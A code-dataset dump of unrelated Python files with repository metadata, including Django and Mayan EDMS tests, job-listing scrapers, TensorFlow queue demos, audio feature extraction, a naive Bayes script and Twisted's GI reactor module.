from mayan.apps.storage.utils import NamedTemporaryFile
from ..settings import (
setting_documentimagecache_storage_arguments,
setting_storage_backend_arguments
)
class DocumentSettingMigrationTestCase(EnvironmentTestCaseMixin, BaseTestCase):
def test_documents_storage_backend_arguments_0001(self):
test_value = {'location': 'test value'}
with NamedTemporaryFile() as file_object:
settings.CONFIGURATION_FILEPATH = file_object.name
file_object.write(
force_bytes(
'{}: {}'.format(
'DOCUMENTS_CACHE_STORAGE_BACKEND_ARGUMENTS',
'"{}"'.format(
Setting.serialize_value(value=test_value)
)
)
)
)
file_object.seek(0)
Setting._config_file_cache = None
self.assertEqual(
setting_documentimagecache_storage_arguments.value,
test_value
)
def test_documents_cache_storage_backend_arguments_0001(self):
test_value = {'location': 'test value'}
with NamedTemporaryFile() as file_object:
settings.CONFIGURATION_FILEPATH = file_object.name
file_object.write(
force_bytes(
'{}: {}'.format(
'DOCUMENTS_STORAGE_BACKEND_ARGUMENTS',
'"{}"'.format(
Setting.serialize_value(value=test_value)
)
)
)
)
file_object.seek(0)
Setting._config_file_cache = None
self.assertEqual(
setting_storage_backend_arguments.value,
test_value
)
|
[
"roberto.rosario@mayan-edms.com"
] |
roberto.rosario@mayan-edms.com
|
cfbcbb6c08a5180985b1d36858eed3a4722b30aa
|
fb2e7a15d2b0ab34cc47664a526640aa80441083
|
/try7.py
|
93f5ff0e9a63ab816b0d7441bd017dc63c7e993e
|
[] |
no_license
|
Jeonghwan-Yoo/python_practice
|
c7b4d19b1da589b12ec025f3ff5729407ee0ca26
|
c82e0308b4b3a227ddbd560cedecc49c036ef4c2
|
refs/heads/master
| 2020-07-27T00:12:33.139274
| 2019-09-16T13:26:49
| 2019-09-16T13:26:49
| 208,806,360
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 220
|
py
|
a=[1,2,3]
try:
a[5]=6
except (ZeroDivisionError,IndexError,TypeError):
print('ZeroDivisionError,IndexError or TypeError')
except:
print('undefined error')
else:
print('good')
finally:
print('necessarily executed')
|
[
"dwgbjdhks2@gmail.com"
] |
dwgbjdhks2@gmail.com
|
93b5dafce54315a1f6bba023be93717bd858afa6
|
95761ba9ca92c9bf68f3fb88524ee01ddba9b314
|
/api-web/src/www/application/modules/search/handlers.py
|
91e5c196d1bcf213917388cff3ae848ef577618a
|
[] |
no_license
|
duytran92-cse/nas-workboard
|
918adf4b976f04a13dc756f8dc32aecf397c6258
|
bebe7674a7c6e8a3776264f18a3b7ca6b417dc7e
|
refs/heads/master
| 2022-10-23T01:02:39.583449
| 2020-06-14T19:25:01
| 2020-06-14T19:25:01
| 272,268,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 984
|
py
|
from notasquare.urad_api import *
from application.models import *
from application import constants
from django.conf import settings
from django.db.models import Q
class Search(handlers.standard.GetHandler):
def get_data(self, data):
kw=str(data['keyword'])
result = {
'board': [],
'category': [],
'story': [],
'matches': 0,
}
for board in Board.objects.filter(name__icontains=kw):
record = {'name': board.name, 'id': board.id}
result['board'].append(record)
for category in BoardCategory.objects.filter(name__icontains=kw):
record = {'name': category.name, 'board_id': category.board.id, 'category_id': category.id}
result['category'].append(record)
for story in BoardStory.objects.filter(name__icontains=kw):
record = {'name': story.name, 'board_id': story.board.id, 'story_id': story.id}
result['story'].append(record)
result['matches'] = len(result['board']) + len(result['category']) + len(result['story'])
return result
|
[
"thanh.tran@etudiant.univ-lr.fr"
] |
thanh.tran@etudiant.univ-lr.fr
|
a4b36ef3012a4833e99a6ced7f53a024ab683991
|
77b94c318ee6014f6080aa34886b85aa47500992
|
/scraping/utils.py
|
c65ed994a3d7f8351d77613dd234a3d3fb7902c3
|
[] |
no_license
|
dm1tro69/rabota_find
|
472c8417784333806db22eb4bb9ef722f5df779d
|
d3b903478186c9fa7313f1fedfefe6b2fe069164
|
refs/heads/master
| 2020-09-06T20:11:23.468166
| 2019-11-06T21:00:16
| 2019-11-06T21:00:16
| 220,536,761
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,194
|
py
|
import codecs
import datetime
import requests
from bs4 import BeautifulSoup as BS
import time
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)'
' Chrome/76.0.3809.100 Safari/537.36'}
def djinni():
session = requests.Session()
base_url = 'https://djinni.co/jobs/?primary_keyword=Python&location=Киев'
domain = 'https://djinni.co'
jobs =[]
urls = []
urls.append(base_url)
urls.append(base_url + '&page=2')
#req = session.get(base_url, headers=headers)
for url in urls:
for url in urls:
time.sleep(2)
req = session.get(url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, "html.parser")
li_list = bsObj.find_all('li', attrs={'class': 'list-jobs__item'})
for li in li_list:
div = li.find('div', attrs={'class': 'list-jobs__title'})
title = div.a.text
href = div.a['href']
short = 'No description'
# company = "No name"
descr = li.find('div', attrs={'class': 'list-jobs__description'})
if descr:
short = descr.p.text
jobs.append({'href': domain + href,
'title': title,
'descript': short,
'company': "No name"})
return jobs
def rabota():
session = requests.Session()
base_url = 'https://rabota.ua/zapros/python/%d0%ba%d0%b8%d0%b5%d0%b2?period=3&lastdate='
domain = 'https://rabota.ua'
jobs = []
urls = []
yesterday = datetime.date.today() - datetime.timedelta(1)
one_day_ago = yesterday.strftime('%d.%m.%Y')
base_url = base_url + one_day_ago
urls.append(base_url)
req = session.get(base_url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
pagination = bsObj.find('dl', attrs={'id': 'ctl00_content_vacancyList_gridList_ctl23_pagerInnerTable'})
if pagination:
pages = pagination.find_all('a', attrs={'class': 'f-always-blue'})
for page in pages:
urls.append(domain + page['href'])
for url in urls:
time.sleep(2)
req = session.get(url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
table = bsObj.find('table', attrs={'id': 'ctl00_content_vacancyList_gridList'})
if table:
tr_list = bsObj.find_all('tr', attrs={'id': True})
for tr in tr_list:
h3 = tr.find('h3', attrs={'class': 'f-vacancylist-vacancytitle'})
title = h3.a.text
href = h3.a['href']
short = 'No description'
company = 'No name'
logo = tr.find('p', attrs={'class': 'f-vacancylist-companyname'})
if logo:
company = logo.a.text
p = tr.find('p', attrs={'class': 'f-vacancylist-shortdescr'})
if p:
short = p.text
jobs.append({'href': domain + href,
'title': title,
'descript': short,
'company': company})
return jobs
def work():
base_url = 'https://www.work.ua/jobs-kyiv-python/'
session = requests.Session()
domain = 'https://www.work.ua'
jobs = []
urls = []
urls.append(base_url)
req = session.get(base_url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
pagination = bsObj.find('ul', attrs={'class': 'pagination'})
if pagination:
pages = pagination.find_all('li', attrs={'class': False})
for page in pages:
urls.append(domain + page.a['href'])
for url in urls:
time.sleep(2)
req = session.get(url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
div_list = bsObj.find_all('div', attrs={'class': 'job-link'})
for div in div_list:
title = div.find('h2')
href = title.a['href']
short = div.p.text
company = 'No name'
logo = div.find('img')
if logo:
company = logo['alt']
jobs.append({'href': domain + href,
'title': title.text,
'descript': short,
'company': company})
return jobs
def dou():
base_url = 'https://jobs.dou.ua/vacancies/?category=Python&city=%D0%9A%D0%B8%D0%B5%D0%B2'
session = requests.Session()
jobs = []
urls = []
urls.append(base_url)
req = session.get(base_url, headers=headers)
for url in urls:
time.sleep(2)
req = session.get(url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
div = bsObj.find('div', attrs={'id': 'vacancyListId'})
if div:
li_list = div.find_all('li', attrs={'class': 'l-vacancy'})
for li in li_list:
a = div.find('a', attrs={'class': 'vt'})
title = a.text
href = a['href']
short = 'No description'
company = 'No name'
a_company = li.find('a', attrs={'class': 'company'})
if a_company:
company = a_company.text
descr = li.find('div', attrs={'class': 'sh-info'})
if descr:
short = descr.text
jobs.append({'href': href,
'title': title,
'descript': short,
'company': company})
return jobs
|
[
"dimolg22@gmail.com"
] |
dimolg22@gmail.com
|
c95b62caf60eaabd5548d4fd3d27c9f4b7bd46b8
|
ffb6d3055d80d3403591f027d71701d4527b139a
|
/ACM-Solution/BEENUMS.py
|
d78ba92b0956733ea134415d77456e0bc1e97785
|
[
"MIT"
] |
permissive
|
wasi0013/Python-CodeBase
|
811f71024e81699363c1cd3b93e59412f20e758d
|
4a7a36395162f68f84ded9085fa34cc7c9b19233
|
refs/heads/master
| 2020-12-24T21:01:38.893545
| 2016-04-26T15:13:36
| 2016-04-26T15:13:36
| 57,138,236
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
import sys
import math
while True:
a=int(input())
if a<0 : break
d= 9+ 12*(a-1)
r= math.sqrt(d)
if r*r ==d :
r-=3
if r%6==0:
print("Y")
else :
print("N")
else : print("N")
|
[
"wasi0013@gmail.com"
] |
wasi0013@gmail.com
|
0462a8a8229711aa4990eb67d187f7b2cb49d77c
|
fdedfbc1290016ae293edcc41df96d0a3fb8a99c
|
/tensorflow-tutorial/tf_imageprocess/tfqueue.py
|
28610c999e22b3f05a98c40c0cede9f3286b0e42
|
[] |
no_license
|
Hsingmin/machine-learning
|
5d798ff974429fccb84ad61b2f72f4bb375c80e3
|
a554d9c2324b5daf0dde4c78f4a9b6e6b630e413
|
refs/heads/master
| 2021-01-23T18:47:51.153195
| 2018-06-14T14:48:09
| 2018-06-14T14:48:09
| 102,808,183
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,029
|
py
|
# tfqueue.py -- Queue as one kind of node in tensorflow have its own status .
#
import tensorflow as tf
import numpy as np
import threading
import time
'''
# Create a FIFO queue that can store two elements of integer type at most .
q = tf.FIFOQueue(2, "int32")
# Initialize elements in queue with enqueue_many() function .
init = q.enqueue_many(([0, 10],))
# Pop the tail element into variable x with dequeue() function .
x = q.dequeue()
y = x + 1
# Push y into queue .
q_inc = q.enqueue([y])
with tf.Session() as sess:
# Run queue initialize operation .
init.run()
for _ in range(5):
# The whole process including popping x , increment and pushing
# will be executed when running q_inc .
v, _ = sess.run([x, q_inc])
print(v)
'''
'''
# Inter-threads communication with tf.Coordinator class .
# Thread quit when shoul_stop() returns True ,
# Notice the other threads quit by calling request_stop() function .
# Function running in thread .
def MyLoop(coord, worker_id):
# Judge whethear stop and print own worker_id .
while not coord.should_stop():
# Stop all threads randomly .
if np.random.rand() < 0.1:
print("Stop from id: %d\n" % worker_id, end="")
# Notice the other threads quit .
coord.request_stop()
else:
print("Working on id : %d\n" % worker_id, end="")
time.sleep(1)
# Create Coordination class .
coord = tf.train.Coordinator()
# Create 5 threads .
threads = [threading.Thread(target=MyLoop, args=(coord, i,)) for i in range(5)]
# Start all threads .
for t in threads:
t.start()
# Wait for all threads quiting .
coord.join(threads)
'''
# Create a fifo queue with 100 elements of real data type at most .
queue = tf.FIFOQueue(100, "float")
# Push operation to queue .
enqueue_op = queue.enqueue([tf.random_normal([1])])
# Create multiple threads to run enqueue operations .
# [enqueue_op]*5 starting 5 threads in which enqueue_op running .
qr = tf.train.QueueRunner(queue, [enqueue_op]*5)
# Add created QueueRunner into collection of Tensorflow Graph .
# In tf.train.add_queue_runner() , no collection specified , then
# add QueueRunner into tf.GraphKeys.QUEUE_RUNNERS collection defaultly .
tf.train.add_queue_runner(qr)
# Pop operation from queue .
out_tensor = queue.dequeue()
with tf.Session() as sess:
# Coordinate started threads using tf.train.Coordinator() .
coord = tf.train.Coordinator()
# Explictly calling tf.train.start_queue_runners() to start all
# threads when QueueRunner() used , otherwise program would wait
# forever when calling dequeue operation .
#
# tf.train.start_queue_runners() will start all QueueRunners in
# tf.GraphKeys.QUEUE_RUNNERS collection , because it can only
# start QueueRunners specified in tf.train.add_queue_runner() .
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
# Get value popped from queue .
for _ in range(3):
print(sess.run(out_tensor)[0])
# Stop all threads with tf.train.Coordinator .
coord.request_stop()
coord.join(threads)
|
[
"alfred_bit@sina.cn"
] |
alfred_bit@sina.cn
|
cf687ec2adc2c5f5e262d3341fb5ff6157f9c7bf
|
3ae1409baed016cc9061ef98806ee7786300d8d2
|
/python_import/feature_handling.py
|
98d3e5bfbed1361706d6d46523872abc8630214b
|
[] |
no_license
|
zashin-AI/minsun
|
550e8b7650fab4e265d11aed186590cbd6df5587
|
144181b619e6716c584b9282adbf8aa4a9fe4fd9
|
refs/heads/master
| 2023-05-08T21:11:02.771058
| 2021-06-04T01:59:24
| 2021-06-04T01:59:24
| 352,831,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,368
|
py
|
import librosa
import numpy as np
import sklearn
import soundfile as sf
def load_data_mfcc(filepath, filename, labels):
'''
Args :
filepath : 파일 불러 올 경로
filename : 불러올 파일 확장자명 e.g. wav, flac....
labels : label 번호 (여자 0, 남자 : 1)
'''
count = 1
dataset = list()
label = list()
def normalize(x, axis = 0):
return sklearn.preprocessing.minmax_scale(x, axis = axis)
files = librosa.util.find_files(filepath, ext=[filename])
files = np.asarray(files)
for file in files:
y, sr = librosa.load(file, sr=22050, duration=1.0)
length = (len(y) / sr)
if length < 5.0 : pass
else:
mels = librosa.feature.mfcc(y, sr=sr)
mels = librosa.amplitude_to_db(mels, ref=np.max)
mels = normalize(mels, axis = 1)
dataset.append(mels)
label.append(labels)
print(str(count))
count+=1
if labels == 0:
out_name = 'female'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mfcc_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mfcc_label.npy',
arr = label
)
elif labels == 1:
out_name = 'male'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mfcc_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mfcc_label.npy',
arr = label
)
data = np.load(
out_dir + out_name + '_mfcc_data.npy'
)
lab = np.load(
out_dir + out_name + '_mfcc_label.npy'
)
return data, lab
##########################################################################################
def load_data_mel(filepath, filename, labels):
'''
Args :
filepath : 파일 불러 올 경로
filename : 불러올 파일 확장자명 e.g. wav, flac....
labels : label 번호 (여자 0, 남자 : 1)
'''
count = 1
dataset = list()
label = list()
def normalize(x, axis=0):
return sklearn.preprocessing.minmax_scale(x, axis=axis)
files = librosa.util.find_files(filepath, ext=[filename])
files = np.asarray(files)
for file in files:
y, sr = librosa.load(file, sr=22050, duration=10.0)
length = (len(y) / sr)
if length < 10.0 : pass
else:
mels = librosa.feature.melspectrogram(y, sr=sr, n_fft=512, hop_length=128)
mels = librosa.amplitude_to_db(mels, ref=np.max)
dataset.append(mels)
label.append(labels)
print(str(count))
count+=1
if labels == 0:
out_name = 'female'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mel_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mel_label.npy',
arr = label
)
elif labels == 1:
out_name = 'male'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mel_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mel_label.npy',
arr = label
)
data = np.load(
out_dir + out_name + '_mel_data.npy'
)
lab = np.load(
out_dir + out_name + '_mel_label.npy'
)
return data, lab
####################################################################################
# 노이즈 제거 파일
def load_data_denoise_mel(filepath, filename, labels):
'''
Args :
filepath : 파일 불러 올 경로
filename : 불러올 파일 확장자명 e.g. wav, flac....
labels : label 번호 (여자 0, 남자 : 1)
'''
count = 1
dataset = list()
label = list()
def normalize(x, axis=0):
return sklearn.preprocessing.minmax_scale(x, axis=axis)
files = librosa.util.find_files(filepath, ext=[filename])
files = np.asarray(files)
for file in files:
y, sr = librosa.load(file, sr=22050, duration=1.0)
length = (len(y) / sr)
if length < 5.0 : pass
else:
mels = librosa.feature.melspectrogram(y, sr=sr, n_fft=512, hop_length=128)
mels = librosa.amplitude_to_db(mels, ref=np.max)
dataset.append(mels)
label.append(labels)
print(str(count))
count+=1
if labels == 0:
out_name = 'female_denoise'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mel_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mel_label.npy',
arr = label
)
elif labels == 1:
out_name = 'male_denoise'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mel_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mel_label.npy',
arr = label
)
data = np.load(
out_dir + out_name + '_mel_data.npy'
)
lab = np.load(
out_dir + out_name + '_mel_label.npy'
)
return data, lab
|
[
"sswwd95@gmail.com"
] |
sswwd95@gmail.com
|
6963934853735f22bd2b699b0ac88fcbc6d34969
|
387400d70932b7b65f0ad0e24cb8290a8ce6ed46
|
/August_18/google2018/109. Convert Sorted List to Binary Search Tree.py
|
c30387c4193b90ad3e1a2c0cb9827f9132a6a1a9
|
[] |
no_license
|
insigh/Leetcode
|
0678fc3074b6294e8369756900fff32c7ce4e311
|
29113d64155b152017fa0a98e6038323d1e8b8eb
|
refs/heads/master
| 2021-01-20T07:51:21.051366
| 2018-09-17T13:33:15
| 2018-09-17T13:33:15
| 90,051,425
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
"""
Given a singly linked list where elements are sorted in ascending order, convert it to a height balanced BST.
For this problem, a height-balanced binary tree is defined as a binary tree in which the depth of the two subtrees of every node never differ by more than 1.
Example:
Given the sorted linked list: [-10,-3,0,5,9],
One possible answer is: [0,-3,9,-10,null,5], which represents the following height balanced BST:
0
/ \
-3 9
/ /
-10 5
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def sortedListToBST(self, head):
"""
:type head: ListNode
:rtype: TreeNode
"""
if not head:
return None
nums = []
while head:
nums.append(head.val)
head = head.next
root = self.constructBinaryTree(nums)
return root
def constructBinaryTree(self,nums):
if not nums:
return None
if len(nums) == 1:
return TreeNode(nums[0])
L = len(nums)
M = len(nums)//2
node = TreeNode(nums[M])
node.left = self.constructBinaryTree(nums[:M])
node.right = self.constructBinaryTree(nums[M+1:])
return node
|
[
"zhangchaojie@ruc.edu.cn"
] |
zhangchaojie@ruc.edu.cn
|
5462675544f12dbe29b1c868dd76aa611f90b43a
|
4fa832c70c3afbb55efc005b5c40167df52c18e0
|
/Python Crash Course/vAnil/Chapter-6/6-11.py
|
81c53c9b9e9abceea0d80ae3b98e44cf4b55529e
|
[] |
no_license
|
DimpleOrg/PythonRepository
|
76f87d21bfbbcc332f1b02956c4a0b48f084a97d
|
82ce549c7c08366a368d4e439e8ff4d66a4176ee
|
refs/heads/main
| 2023-06-09T21:54:28.330130
| 2021-05-06T13:00:48
| 2021-05-06T13:00:48
| 340,079,685
| 0
| 0
| null | 2021-07-01T12:41:39
| 2021-02-18T14:43:09
|
HTML
|
UTF-8
|
Python
| false
| false
| 680
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 17:04:37 2021
@author: ANIL
"""
cities = {
'delhi': {
'country': 'India',
'population': '2 crores',
'fact': 'capital of India'
},
'lucknow': {
'country': 'India',
'population': '50 lakhs',
'fact': 'capital of UP',
},
'mumbai': {
'country': 'India',
'population': '1 crore',
'fact': 'city of Indian film industry.'
},
}
for city in cities:
print(f'\nCity:\t\t\t{city.title()} \nInformations:')
for key, value in cities[city].items():
print(f'\t\t\t\t{key.title()}:\t{value}')
print('\n')
|
[
"anil.kumar4@hp.com"
] |
anil.kumar4@hp.com
|
7987a696a4686316125b988503e2541779de5618
|
18fff3ece39927a72a2977c5266f9371e94cf06a
|
/scripts/config/config.py
|
1d5c00d0f4c3569df3d3f12be432d2c265420eae
|
[
"MIT"
] |
permissive
|
luiscape/hdxscraper-ors
|
0d2699be4269921abbe87191eca0cc3108b61142
|
ec307625dcf266e448753d4de15b9a3d47c4026f
|
refs/heads/master
| 2021-01-25T03:48:34.096902
| 2015-06-22T21:26:02
| 2015-06-22T21:26:02
| 22,961,731
| 2
| 0
| null | 2015-05-20T19:56:27
| 2014-08-14T17:02:05
|
Python
|
UTF-8
|
Python
| false
| false
| 665
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
dir = os.path.split(os.path.split(os.path.realpath(__file__))[0])[0]
sys.path.append(dir)
import json
from utilities.hdx_format import item
def LoadConfig(j='prod.json', verbose=True):
'''Load configuration parameters.'''
data_dir = os.path.join(os.path.split(dir)[0], 'config')
try:
j = os.path.join(data_dir, j)
with open(j) as json_file:
config = json.load(json_file)
except Exception as e:
print "%s Couldn't load configuration." % item('prompt_error')
if verbose:
print e
return False
return config
if __name__ == "__main__":
LoadConfig()
|
[
"luiscape@gmail.com"
] |
luiscape@gmail.com
|
ac30ba60a8ca7582effac94ead627f85ddf977c0
|
4eddf6a34715752dc652571b1ab274f51ceb5da0
|
/Bayes Classification/.history/Bayes_main_20210428162403.py
|
fe9dc422ef038bea4328c618c7e6c8136a840ae0
|
[] |
no_license
|
Suelt/Hust-SE-introduction-to-ML
|
649aba0e5b41363ceac03330ef02982982a0615d
|
a66785c3085da573f5748d13608eabf02e616321
|
refs/heads/master
| 2023-05-27T13:13:41.058545
| 2021-06-10T05:44:02
| 2021-06-10T05:44:02
| 375,582,438
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,156
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn import model_selection
credit = pd.read_csv("C:\\pyproject\\Bayes Classification\\transformed.csv")
y = credit['credit_risk']
X = credit.loc[:,'status':'foreign_worker']
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.3, random_state=1)
cols = ['status','duration','credit_history', 'purpose','amount','savings', 'employment_duration','installment_rate', 'personal_status_sex', 'other_debtors',
'present_residence','property','age','other_installment_plans','housing','number_credits','job','people_liable','telephone','foreign_worker']
train=credit.loc[y_train.index]
train_good=train.loc[train['credit_risk']=='good']
length_good=train_good.shape[0]
train_bad=train.loc[train['credit_risk']=='bad']
length_bad=train_bad.shape[0]
dict_main_true={}
dict_main_false={}
for col in cols:
dict_main_true[col]={}
dict_main_false[col]={}
#满足P(Xij|yk)的个数
number_value=0
#满足P(Xij|yk)的概率
rate=0
cols.remove('duration')
cols.remove('amount')
cols.remove('age')
# print(cols)
for col in cols:
dict_new_good={}
dict_new_bad={}
values =train_good[col].value_counts().keys().tolist()
for value in values:
number_value=train_good[col].value_counts()[value]
rate=number_value/length_good
dict_new_good[value]=rate
number_value=train_bad[col].value_counts()[value]
rate=number_value/length_bad
dict_new_bad[value]=rate
dict_main_true[col]=dict_new_good
dict_main_false[col]=dict_new_bad
dict_gaussian={}
dict_gaussian['duration']={}
dict_gaussian['amount']={}
dict_gaussian['age']={}
for key in dict_gaussian:
dict_new={}
list_good=train_good[key]
arr_mean = np.mean(list_good)
arr_std = np.std(list_good,ddof=1)
dict_new['good']=[arr_mean,arr_std]
list_bad=train_bad[key]
arr_mean = np.mean(list_bad)
arr_std = np.std(list_bad,ddof=1)
dict_new['bad']=[arr_mean,arr_std]
dict_gaussian[key]=dict_new
print(X_test,y_test)
y=y_test
print(y)
# print(dict_main_true)
# print(dict_main_false)
|
[
"2552925383@qq.com"
] |
2552925383@qq.com
|
e328b50030a57047e83da491475b3a082fcbf5c0
|
b9dc028b6a62d681ef02f149efc903a182edcf13
|
/week/6주차_선형재귀와 반복/6-4.1.py
|
461553338bed4291c6e206396a85073b33bca798
|
[] |
no_license
|
masiro97/Python
|
0d1963867c5e6fec678d8b9d07afa6aa055305ed
|
78ec468630110cdd850e5ecaab33e5cf5bde0395
|
refs/heads/master
| 2021-05-10T22:47:28.692417
| 2018-01-20T17:58:46
| 2018-01-20T17:58:46
| 118,267,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
def power(b,n):
if n>0:
if n%2 ==0:
return power(b**2,n//2)
else:
return b * power(b,n-1)
else:
return 1
|
[
"estrk7120@gmail.com"
] |
estrk7120@gmail.com
|
2db4950cce667880d8a89f0a16b27301c138bbad
|
31009efe0b3882551f03dcaa9c71756c7c6f6ede
|
/src/main/resources/twisted/internet/gireactor.py
|
a7ada11c7385128a3d2c2f55a02998df86151f47
|
[
"Apache-2.0",
"ZPL-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
riyafa/autobahntestsuite-maven-plugin
|
b533433c75f7daea2757158de54c6d80d304a962
|
737e6dad2d3ef794f30f0a2013a77e28decd2ec4
|
refs/heads/master
| 2020-08-16T13:31:39.349124
| 2019-10-16T09:20:55
| 2019-10-16T09:20:55
| 215,506,990
| 0
| 0
|
Apache-2.0
| 2019-10-16T09:18:34
| 2019-10-16T09:18:34
| null |
UTF-8
|
Python
| false
| false
| 6,123
|
py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module provides support for Twisted to interact with the glib
mainloop via GObject Introspection.
In order to use this support, simply do the following::
from twisted.internet import gireactor
gireactor.install()
If you wish to use a GApplication, register it with the reactor::
from twisted.internet import reactor
reactor.registerGApplication(app)
Then use twisted.internet APIs as usual.
On Python 3, pygobject v3.4 or later is required.
"""
from __future__ import division, absolute_import
from twisted.python.compat import _PY3
from twisted.internet.error import ReactorAlreadyRunning
from twisted.internet import _glibbase
from twisted.python import runtime
if _PY3:
# We require a sufficiently new version of pygobject, so always exists:
_pygtkcompatPresent = True
else:
# We can't just try to import gi.pygtkcompat, because that would import
# gi, and the goal here is to not import gi in cases where that would
# cause segfault.
from twisted.python.modules import theSystemPath
_pygtkcompatPresent = True
try:
theSystemPath["gi.pygtkcompat"]
except KeyError:
_pygtkcompatPresent = False
# Modules that we want to ensure aren't imported if we're on older versions of
# GI:
_PYGTK_MODULES = ['gobject', 'glib', 'gio', 'gtk']
def _oldGiInit():
"""
Make sure pygtk and gi aren't loaded at the same time, and import Glib if
possible.
"""
# We can't immediately prevent imports, because that confuses some buggy
# code in gi:
_glibbase.ensureNotImported(
_PYGTK_MODULES,
"Introspected and static glib/gtk bindings must not be mixed; can't "
"import gireactor since pygtk2 module is already imported.")
global GLib
from gi.repository import GLib
if getattr(GLib, "threads_init", None) is not None:
GLib.threads_init()
_glibbase.ensureNotImported([], "",
preventImports=_PYGTK_MODULES)
if not _pygtkcompatPresent:
# Older versions of gi don't have compatability layer, so just enforce no
# imports of pygtk and gi at same time:
_oldGiInit()
else:
# Newer version of gi, so we can try to initialize compatibility layer; if
# real pygtk was already imported we'll get ImportError at this point
# rather than segfault, so unconditional import is fine.
import gi.pygtkcompat
gi.pygtkcompat.enable()
# At this point importing gobject will get you gi version, and importing
# e.g. gtk will either fail in non-segfaulty way or use gi version if user
# does gi.pygtkcompat.enable_gtk(). So, no need to prevent imports of
# old school pygtk modules.
from gi.repository import GLib
if getattr(GLib, "threads_init", None) is not None:
GLib.threads_init()
class GIReactor(_glibbase.GlibReactorBase):
"""
GObject-introspection event loop reactor.
@ivar _gapplication: A C{Gio.Application} instance that was registered
with C{registerGApplication}.
"""
_POLL_DISCONNECTED = (GLib.IOCondition.HUP | GLib.IOCondition.ERR |
GLib.IOCondition.NVAL)
_POLL_IN = GLib.IOCondition.IN
_POLL_OUT = GLib.IOCondition.OUT
# glib's iochannel sources won't tell us about any events that we haven't
# asked for, even if those events aren't sensible inputs to the poll()
# call.
INFLAGS = _POLL_IN | _POLL_DISCONNECTED
OUTFLAGS = _POLL_OUT | _POLL_DISCONNECTED
# By default no Application is registered:
_gapplication = None
def __init__(self, useGtk=False):
_gtk = None
if useGtk is True:
from gi.repository import Gtk as _gtk
_glibbase.GlibReactorBase.__init__(self, GLib, _gtk, useGtk=useGtk)
def registerGApplication(self, app):
"""
Register a C{Gio.Application} or C{Gtk.Application}, whose main loop
will be used instead of the default one.
We will C{hold} the application so it doesn't exit on its own. In
versions of C{python-gi} 3.2 and later, we exit the event loop using
the C{app.quit} method which overrides any holds. Older versions are
not supported.
"""
if self._gapplication is not None:
raise RuntimeError(
"Can't register more than one application instance.")
if self._started:
raise ReactorAlreadyRunning(
"Can't register application after reactor was started.")
if not hasattr(app, "quit"):
raise RuntimeError("Application registration is not supported in"
" versions of PyGObject prior to 3.2.")
self._gapplication = app
def run():
app.hold()
app.run(None)
self._run = run
self._crash = app.quit
class PortableGIReactor(_glibbase.PortableGlibReactorBase):
"""
Portable GObject Introspection event loop reactor.
"""
def __init__(self, useGtk=False):
_gtk = None
if useGtk is True:
from gi.repository import Gtk as _gtk
_glibbase.PortableGlibReactorBase.__init__(self, GLib, _gtk,
useGtk=useGtk)
def registerGApplication(self, app):
"""
Register a C{Gio.Application} or C{Gtk.Application}, whose main loop
will be used instead of the default one.
"""
raise NotImplementedError("GApplication is not currently supported on Windows.")
def install(useGtk=False):
"""
Configure the twisted mainloop to be run inside the glib mainloop.
@param useGtk: should GTK+ rather than glib event loop be
used (this will be slightly slower but does support GUI).
"""
if runtime.platform.getType() == 'posix':
reactor = GIReactor(useGtk=useGtk)
else:
reactor = PortableGIReactor(useGtk=useGtk)
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
__all__ = ['install']
|
[
"nmaurer@redhat.com"
] |
nmaurer@redhat.com
|
2cae4e3b0562f72541fbb29166ea5f6cf51778db
|
a336dcd58a1e425add4add54dd0640ce1829e2ba
|
/language_modeling/language_utils.py
|
45463ef7377097b692feb461e34052e71368e06c
|
[
"MIT"
] |
permissive
|
ylsung/FedMA
|
8d0b15bcecc98f87f8d1fe3283dadea38797fa3f
|
d80c22c0a464abcbc47346b9cbc0080a2556fa49
|
refs/heads/master
| 2022-04-12T20:31:53.064893
